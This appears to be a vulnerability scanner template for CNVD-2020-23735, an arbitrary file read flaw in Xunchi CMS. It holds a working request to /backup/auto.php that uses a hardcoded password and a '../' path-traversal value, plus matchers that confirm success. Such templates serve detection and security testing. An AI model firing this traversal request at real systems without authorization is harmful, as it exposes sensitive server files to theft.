id: CNVD-2020-23735 info: name: Xxunchi Local File read author: princechaddha severity: medium description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information. reference: https://www.cnvd.org.cn/flaw/show/2025171 tags: xunchi,lfi,cnvd requests: - method: GET path: - "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" part: body condition: and